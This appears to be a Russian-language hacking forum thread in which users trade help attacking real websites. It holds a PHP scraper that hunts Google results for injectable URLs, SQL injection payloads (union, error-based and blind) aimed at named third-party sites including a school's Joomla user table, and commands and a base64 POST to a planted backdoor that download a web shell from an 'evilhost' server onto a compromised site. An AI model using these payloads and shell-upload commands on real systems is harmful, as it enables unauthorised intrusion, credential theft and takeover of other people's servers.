вот, так сказать, в ознакомительных целях скрипт написанный за пару минут(парсинг гугла откуда то с ачата)

Code:
]*[Hh][Rr][Ee][Ff][^=]*=[ '\"\n\r\t]*([^ \"'>\r\n\t#]+)[^>]*>/",$html,$a);
for($x=0; $x 0)
//$str = substr($str, 0, $end);
if(strpos($been, str_replace('www.','',$str)) === false)
{
$been .= $str . '+';
$url = 'http://'.$str;
if (strpos($url,'?')!==false) {
$u = parse_url($url);
$s = '';
if (preg_match_all('#(.*?)&#',$u['query'],$q)) {
foreach ($q[1] as $t) $s.=$t."'&";
$s.=substr($u['query'],strrpos($u['query'],'&')+1,strlen($u['query']))."'";
}
else $s = $u['query']."'";
$page = file_get_contents($url);
$page1 = file_get_contents($u['scheme'].'://'.$u['host'].'/'.$u['path'].'?'.$s);
if ($page!==$page2) fputs($f1,$str."\n");
}
}
}
}
Sleep(45);
}
}
flose($f1);
flose($f);
?>



PHP Warning: fopen(dorks.txt): failed to open stream: No such file or directory in C:\Program Files\PHP\1.php on line 2

PHP Warning: feof(): supplied argument is not a valid stream resource in C:\Program Files\PHP\1.php on line 4

PHP Warning: fgets(): supplied argument is not a valid stream resource in C:\Program Files\PHP\1.php on line 5

не работает скрипт =\

значит пока рано тебе этот скрипт использовать

ну раз рано, то рано, а экзешники есть?

Какие экзешники? =\


не работает скрипт =\


А создать файлики dorks.txt и links.txt?

Скрипт работает.

Ребят поставил framework metasploit на убунту, ставил с тарболла, нужные библиотеки и т.д. раскручивал в ручную ... в итоге, даже модуль nmap вручную прикручивал, так вот при любом скане, db_autppwn при разгрузке модулей 2-ой модуль разгружается по 100-150 раз в итоге ждать приходиться больше часа. Может кто сталкивался с такой проблемой, как решить? проштудировал офф блог метасплойта писали что баг был только 3.4, а в поздних версиях уже исправлено, хотя ставил фрейм 3.5.2 ...

Можно ли отправить UPDATE в соседнюю БД через sql-inj?


Code:
?id=-1;UPDATE+BD.table+SET+text=hello+WHERE+id=1+--+

Не уходит

В mysql нельзя.

Code:
Для большей надежности, WordPress хранит в базе данных не сами пароли, а их свертки (хэши, составленные по алгоритму MD5). Узнать пароль по хэшу можно лишь методом перебора, зашифровывая слова из словаря и сравнивая их хэш с хэшем пароля. То же самое происходит при аутентификации.

Уязвимость же позволяет не подбирать пароль, а подставить его в куки и получить доступ. Технически, атакующий должен отправить на сайт следующие куки: wordpressuser_(хэш URL) = (имя пользователя) wordpresspass_(хэш URL)= хэш хэша пароля. Остается только добыть хэши паролей, что можно сделать при помощи SQL-инъекции, сообщает Heise-Security.co.uk. Впрочем, в настоящее время о таких уязвимостях в WordPress ничего не опубликовано; но для старых версий они существуют.

наткулся вот на что в инете, возник следующий вопрос, кто в курсе в каких версиях присутствует данный баг?

и есть ли возможность воспользеватся данным багом на новых движках?

Mr.Br0wn said:
...
наткулся вот на что в инете, возник следующий вопрос, кто в курсе в каких версиях присутствует данный баг?
и есть ли возможность воспользеватся данным багом на новых движках?


https://forum.antichat.net/threadnav50572-1-10.html


Остается только добыть хэши паролей, что можно сделать при помощи SQL-инъекции




суть была узнать про конкретную багу а не смотреть все уязвимости


Ну, все верно, тебя интересуют скули..

Или тебе что, теперь все скули из той темы сюда перенести?


p.s. то что я искал, в этой теме под мою версию нету


А не легче спросить, есть ли скуль в твоей версии нежели просить цитировать все версии?

если не знаешь то лучше не набивай посты.

видел данную тему уже несчитанное количество раз, суть была узнать про конкретную багу а не смотреть все уязвимости.

p.s. то что я искал, в этой теме под мою версию нету.

pss. Добавлено специально для тебя

Хеш я выдрал, каким способом говорить не буду. Мне было интересно узнать чисто про авторизацию с подменами кукисов.

Читай внимательней мой пост, будь проще

delete

omg_it_glowZ said:
Что есть Post SQL инъекция? Для чего может пригодится?
Поискал в интернете, ничего вразумительного не нашёл


параметры передаются методом пост, в таком параметре как и в тех что передаются методом гет..есть баги..иньекция.... практически тоже самое..только способ раскрутки другой , через софт..таже тулза от пашкелы поддeрживает метод пост..

Здесь можно вывести через ошибку?

http://www.pubcrawler.com/Template/dsp_restaurant_zoom.cfm/flat/ID=329594+order+by+29+--+

Добрый вечер. Я новичок в этом деле и у меня возник такой вопрос

Нашел админку на сайте http://.ru/admin/index/login/

пробовал найти SQL inj но нечего не получается, любой запрос который не совпадает с директориями

/projects/

/user/reg/

/index/

/index/help/

/index/contacts/

/index/about/

/index/agreement/

/index/support/

/index/faq/

/user/forgot_pass/

/index/err404/

выдает ошибку что Не удается найти веб-страницу.

Просканил сервек спайдером, выдает кучу дырок типа Просмотр файлов (Apache)Просмотр содержимого сценариев(NCSA/Apache httpd)Удаленное выполнение команд (Apache) подскажите как их использовать

спроси у программы, он знает лучше

всем доброго времени суток. такой вопрос:

на сервере mssql. работает скрипт, который выводит инфу о пользователе.

пример: eyvasaaaa.com/getinfo/user/13

чё делаю ? - добавляю что-нибудь после "13" (например плюс.. ну или ещё что).

результат выходит в ошибке: Conversion failed when converting the varchar value '13+' to data type int. когда ставлю кавычку ' ,то фильтрует в


PHP:
'

вторую " в


PHP:
&quot

чё можно сделать ?

Ничего не выйдет: в скрипте принудительный перевод в тип int и, видимо, фильтруются спецсимволы.

попугай said:
в скрипте принудительный перевод в тип int


через эту ошибку выводили данные с базы, есть примеры на форуме. только там была переменная выведена, т.е, к примеру, script.asp?userid=13, а тут то нет ) тут script/user/13

имеется сайт. движок - drupal.

в _http://www.site.ru/misc/drupal.js увидел следующее:


Code:
// $Id: drupal.js,v 1.41.2.4 2009/07/21 08:59:10 goba Exp $

это первая строка.

я так понимаю это(1.41.2.4) версия этого друпала?

Гуру, помогите разобраться...

верисю друпал можно узнать из файла CHANGELOG.txt

http://site.com/CHANGELOG.txt

или там где распаложен друпал

смотриш в какой версии был последний багфикс, и следовательно узнаеш версию

exT1ma4ka said:
через эту ошибку выводили данные с базы, есть примеры на форуме. только там была переменная выведена, т.е, к примеру, script.asp?userid=13, а тут то нет ) тут script/user/13



ну это то же самое, только URL-rewrite используется.

Дай ссылку на пример, где эксплуатируется эта уязвиимость.

Konqi said:
верисю друпал можно узнать из файла CHANGELOG.txt
http://site.com/CHANGELOG.txt
или там где распаложен друпал
смотриш в какой версии был последний багфикс, и следовательно узнаеш версию


Первым делом я так и сделал, но галяк... Сайт возвращает: "Страница не найдена".

Drupal 6. Конкретнее не знаю.

попугай said:
Дай ссылку на пример, где эксплуатируется эта уязвиимость.


да вот даже не знаю где можно пример найти, там самописный двиг. стоит на mssql - это 100%. в принципе хотелось бы как-нибудь вставить кавычку, она судя по всему и нужна для успешной инъекции.. только трабл, как я писал - она фильтруется. какие ещё способы ?

вот тут вот _http://www.xakep.ru/post/43124/ описывается как ломать mssql. пункт:


Следующая проблема, которая вызывает массу вопросов у новичков, и которая в свое время тоже вогнала меня в ступор, это фильтрация кавычки.


очень странный. он в таком случае юзает просто без кавычек инжу ) что в моём случае не тянет..

exT1ma4ka said:
да вот даже не знаю где можно пример найти, там самописный двиг. стоит на mssql - это 100%. в принципе хотелось бы как-нибудь вставить кавычку, она судя по всему и нужна для успешной инъекции.. только трабл, как я писал - она фильтруется. какие ещё способы ?
вот тут вот _http://www.xakep.ru/post/43124/ описывается как ломать mssql. пункт:
очень странный. он в таком случае юзает просто без кавычек инжу ) что в моём случае не тянет..



Да, я ошибся. Инъекцию легко провести в таком случае как у тебя вот так.

eyvasaaaa.com/getinfo/user/13'%20or%201=@@version--

Но так как у тебя кавычка фильтруется, то сделать это будет сложней или вообще невозможно. Для начала нужно определить каким-либо образом действительно ли в скрипте идет перевод спецсимволов в сущности(аналог htmlspecialchars() в php)...

http://www.biowoodenergy.com/newsletter.php

POST sample@email.tst&energy%5b%5d= '

не поддаётся , кому не сложно посмотрите

есть ли там вообще дыра

спс

подскажите пожалуйста

http://www.cwars.ru/lib/index.php?r='

это Sql уязвимость? пытаюсь определить количество полей, нечего не получается.

помгите кто знает

Недавно при сканирование одного сервиса через Acunetix Web Vulnerability Scanner 7 нашол следующию дырдочку а вот теперь как сней дальше быть ненаю

Сами дырдачки

Security fixes in Apache version 1.3.39:

CVE-2006-5752 (cve.mitre.org) mod_status: Fix a possible XSS attack against a site with a public server-status page and ExtendedStatus enabled, for browsers which perform charset "detection". Reported by Stefan Esser. [Joe Orton]

CVE-2007-3304 (cve.mitre.org) Ensure that the parent process cannot be forced to kill non-child processes by checking scoreboard PID data with parent process privately stored PID data.

если не сложно и можно подскажите что дальше и где достать сам скрипт и exploit и вобще возможна ли атака sql Inj

спасибо!!!

вобще возможна ли атака sql Inj


Не возможна т.к её нет.

DCrypt said:
Не возможна т.к её нет.


Понятное дело что щас её там нет но дырдачка в самом апаче если его обойти и залить намеренно файл который будит дампить бд это возможно и что для этого надо

Dima282 said:
подскажите пожалуйста
http://www.cwars.ru/lib/index.php?r='
это Sql уязвимость? пытаюсь определить количество полей, нечего не получается.


http://www.cwars.ru/lib/index.php?r='+or+1+group+by+concat(version(),floor (rand(0)*2))having+min(0)+or+1+--+

интересует вот этот баг JBoss HttpAdaptor JMXInvokerServlet если можно назват багом

нашел док про нему но пока что английский хромает))

http://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf

если кто знает норм подробную описание был бы благодарен

попугай said:
Для начала нужно определить каким-либо образом действительно ли в скрипте идет перевод спецсимволов в сущности(аналог htmlspecialchars() в php)...


как это можно сделать ?

Нашел какую то нестандартную скулю, ну или или ее подобие на нужном мне сайте.

http://www.bading.com/index.php?option=com_fireboard&Itemid=33&func=view&catid=2&id=667

После того как подставляю ' к func=view, сообщения ниже пропадают. Но если уберу &catid=2&id=667 сообщений и так не будет.

Подскажите пожалуйста, как с ней работать и скуля ли это вообще?

Добавлено через время

И ещё вот есть скуля, но вот в чем проблема пока что не понял. Не могу подобрать количество столбцов.

http://www.boatquotes.com/marine-surveys.php?catid=5

Fooog said:
И ещё вот есть скуля, но вот в чем проблема пока что не понял. Не могу подобрать количество столбцов.
http://www.boatquotes.com/marine-surveys.php?catid=5


Думаю, что раскрутить её не получится.

FlaktW said:
Думаю, что раскрутить её не получится.


http://www.boatquotes.com/marine-surveys.php?catid=5/**/uNiOn/**/SeLeCt/**/1--+

Не могу понять логики запроса... Может кто сможет далее раскрутить.

Ну или можно крутить, как блайнд:

http://www.boatquotes.com/marine-surveys.php?catid=5/**/and/**/substring(version(),1,1)=5--+ (true)

http://www.boatquotes.com/marine-surveys.php?catid=5/**/and/**/substring(version(),1,1)=4--+ (false)

Попробуй сделать вывод в ошибку.

http://www.boatquotes.com/marine-surveys.php?catid=5/**/and/**/row(1,2)in(select/**/count(*),concat((select/**/version()/**/from/**/information_schema.tables/**/limit/**/0,1),0x3a,floor(rand(0)*2))as/**/a/**/from/**/information_schema.tables/**/x/**/group/**/by/**/a)

Konqi said:
http://www.boatquotes.com/marine-surveys.php?catid=5/**/and/**/row(1,2)in(select/**/count(*),concat((select/**/version()/**/from/**/information_schema.tables/**/limit/**/0,1),0x3a,floor(rand(0)*2))as/**/a/**/from/**/information_schema.tables/**/x/**/group/**/by/**/a)


Konqi , что можно почитать по этому вопросу, дай ссылки, особенно интересует подстановка row(1,2) в запрос.

FlaktW said:
Konqi , что можно почитать по этому вопросу, дай ссылки, особенно интересует подстановка row(1,2) в запрос.


http://custos.ru/images/img/336861846665879554707306263.jpg

а вообще вот (https://antichat.live/threads/119047/)

Всем доброго время суток нашол есчё кое что на том же портале где и писал высше про уязвимость в апаче при запросе сервер выдаёт 500 ошибочку

/mess?uidc=%5B%USER_CLICKCODE%%5D'&mid=%5B%MESS_ID%%5D'&url=980852'

кто реально может помочь пишите в личку дам полный линк

а ситуация такая когда начинаю раскручивать начинает просто выкидывать на главную страницу или выдавать 404 ошибочку 2 сутки бьюсь хелп люди

fin13 said:
Всем доброго время суток нашол есчё кое что на том же портале где и писал высше про уязвимость в апаче при запросе сервер выдаёт 500 ошибочку
/mess?uidc=%5B%USER_CLICKCODE%%5D'&mid=%5B%MESS_ID%%5D'&url=980852'
кто реально может помочь пишите в личку дам полный линк
а ситуация такая когда начинаю раскручивать начинает просто выкидывать на главную страницу или выдавать 404 ошибочку 2 сутки бьюсь хелп люди


А в чем проблема, что 404 или выкидывает?

1) Может быть WAF.

2) Если идет инклюд или открытие файла, а ты вставляешь кавычку или из-за кавычки SQL-запрос становиться неверным, то перекидывать на главную страницу.

Там может быть и нету иньекции, с чего ты взял что она есть? о_0

Ну или попробуй вместо кавычки подставить верный SQL-запрос (and 1=1), и неверный (and 1=2) если при первом не перекинуло на главную, а на 2ом перекинуло, то SQL-inject есть.

Удачи.

какие еще команды есть напободие wget?



можно ли этой командой залить полноценный шелл? можно примерчик?

качай курлом и записывай в файл

UPD: зачем ты юзаеш этот бекдор если не знаеш что оно делает?

вариантов море, eval()+file_get_contents(), copy(),wget, sockets, php_curl, system_curl

noviyuser said:
какие еще команды есть напободие wget?


curl, fetch, links, lynx, get

Проверить наличие качалок можно команой which.

В консоли: which curl, если качалка установлена, то в ответ получишь /usr/bin/curl (полный путь к исполняемому файлу на сервере)

Синтаксис:

get -o /path/shell.php http://site.com/shell.txt

fetch -o /path/shell.php http://site.com/shell.txt

curl --output /path/shell.php http://site.com/shell.txt

links -source http://site.com/shell.txt > /path/shell.php

lynx -source http://site.com/shell.txt > /path/shell.php



можно ли этой командой залить полноценный шелл? можно примерчик?


Можно, зависит от настроек php.

Пример для allow_url_fopen = on (ну и функция copy разумеется не должна находиться в disable functions)

Посылаешь пакет:


HTML:
POST http://site.com/backdoor.php HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Keep-Alive: 115
Connection: keep-alive

e=Y29weSgnaHR0cDovL2V2aWxob3N0L3NoZWxsLnR4dCcsJy9z aXRlL3d3dy9zaGVsbC5waHAnKTs

где e=copy('http://evilhost/shell.txt','/site/www/shell.php'); в base64_encode

http://evilhost/shell.txt - откуда льем

/site/www/shell.php - куда (абсолютный путь до папки доступной на запись)

тама очень просто с курлом


Code:
curl http://evilhost/shell.php > /home/www/public_html/shell.php

Помогите обойти фильтрацию.

http://www.footballfoundation.org/news.php?id=2194/**/union/**/select/**/1,2,3,4,5,6,7+--+

PHP:


пост наше щастье

Ребят конечно это не вопрос, но прошу помощи ... Нужны линки на книги по sql иньекциям, чтобы бы было разжевано от а до я ... желательно дб оракл и мускул, девтеева пдфки читал и ачат все явно устарело ... Не пинайте сильно.

Lijzer said:
Ребят конечно это не вопрос, но прошу помощи ... Нужны линки на книги по sql иньекциям, чтобы бы было разжевано от а до я ... желательно дб оракл и мускул, девтеева пдфки читал и ачат все явно устарело ... Не пинайте сильно.


Эм... Способ эксплуатации SQL-inject'a не изменился и не думаю, что измениться. А если хочешь разобраться хорошо в разных SQL-языках, то читай книги по этим языкам и все. А для всего остального шпаргалки\статьи, которые есть на широких просторах интернета и в т.ч. на этом форуме.

Помогите разобраться с sql-иньекциями.

С помощью сканера из этого топика (https://antichat.live/threads/262209/) нашел 10 уязвимостей на нужном мне сайте, большинство из них sql. Сам сканер в качестве уязвимой ссылки выдает что-то оканчивающееся на 0'+'1'=2. Пробовал подставлять вместо этого различные эксплоиты и просто кавычку, но показывается обычная страница, без всяких ошибок.

Собственно интересно, сканер врет или я что-то не то делаю... Как можно проверить на sql уязвимость кроме кавычки?

как говорил конки, спроси у сканера

а если по теме то https://forum.antichat.net/thread19844.html

Судя по первому абзацу все-же сканер врет...

Сайт нагуглил по версии джумлы, вот линки на предполагаемые уязвимости

liceum9.ru/index.php?option=com_comprofiler&task=userProfile&user=1+and+1=2 (http://liceum9.ru/index.php?option=com_comprofiler&task=userProfile&user=1+and+1=2) юзеры начинаются с id 121, для их просмотра пришлось зарегится.

http://www.liceum9.ru/index.php?option=com_content&task=blogcategory&id=60&Itemid=%2099999%20union%20select%201,concat_ws%280 x3a,username,password%29,%203,4,5%20from%20jos_use rs/* (http://www.liceum9.ru/index.php?option=com_content&task=blogcategory&id=60&Itemid=)

http://www.liceum9.ru/index.php?option=com_banners&task=archivesection&id='0'+and+'1'='2 (http://www.liceum9.ru/index.php?option=com_banners&task=archivesection&id=%270%27+and+%271%27=%272)

В последнем вообще валидный id подобрать не смог...

Проверьте, пожалуйста, эти ссылки на sql-уязвимость. Очень хочется, чтобы первый блин не вышел комом.